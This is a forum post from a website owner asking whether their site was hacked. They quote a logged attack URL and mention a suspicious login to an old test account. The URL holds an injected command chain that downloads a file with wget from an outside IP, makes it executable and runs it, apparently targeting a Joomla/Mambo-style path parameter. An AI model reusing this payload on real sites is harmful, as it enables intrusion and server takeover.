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Did I get hacked today?


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I'm wondering if anyone can help me out. I noticed the following in my web stats today and assumed it was just another attempted to try and hack my site. Here's the url that was recorded:[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicup


I've gotten a few of these in the past and have simply denied access to the IPs. They never seem to appear again.


But this time, about an hour later, I noticed someone logged on using an old test account that I created a few months back. They logged on for about 8 minutes and then loged off using my logoff.php page. Strange. The originating IP address is not the same but both IP addresses are from the same ISP; MCI.


I'm wondering what happened. Did someone get a hold of my accounts and passwords? How did this happen? Anyone have any ideas?






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